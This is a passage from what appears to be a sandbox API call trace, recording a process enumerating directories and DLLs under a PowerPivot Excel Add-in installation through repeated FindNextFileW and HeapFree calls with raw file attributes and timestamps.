nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0164.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.746] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0164.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.747] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0164.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.749] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0164.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.751] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0164.751] FindClose (in: hFindFile=0x7279c8 | out: hFindFile=0x7279c8) returned 1 [0164.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0164.751] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PowerPivot Excel Add-in", cAlternateFileName="POWERP~1")) returned 1 [0164.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.754] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0164.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.756] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0164.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.759] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0164.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.761] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0164.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.764] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0164.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.766] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0164.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.768] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0164.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.771] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0164.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.771] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0164.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.774] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0164.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.902] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0165.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.028] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0165.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.032] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0165.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.034] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0165.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.035] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0165.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.037] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0165.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.039] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f23aa6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0165.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.041] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0165.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.044] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf158c060, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0165.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.046] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Interop.MSDASC.dll", cAlternateFileName="INTERO~1.DLL")) returned 1 [0165.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.049] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0165.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.052] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0165.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.054] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0165.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.057] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0165.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.060] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0165.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.063] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDXQueryGenerator.DLL", cAlternateFileName="MDXQUE~1.DLL")) returned 1 [0165.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.195] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0165.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.198] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0165.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.201] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5ad675f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5ad675f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5ad675f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6faa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.DLL", cAlternateFileName="")) returned 1 [0165.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.204] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPivotExcelClientAddIn.dll", cAlternateFileName="POWERP~1.DLL")) returned 1 [0165.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.206] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0165.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.209] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae48f06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae48f06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae6f174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportingServicesNativeClient.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0165.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.378] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefee59ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1026", cAlternateFileName="")) returned 1 [0165.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.378] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1755c61, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="10266", cAlternateFileName="")) returned 1 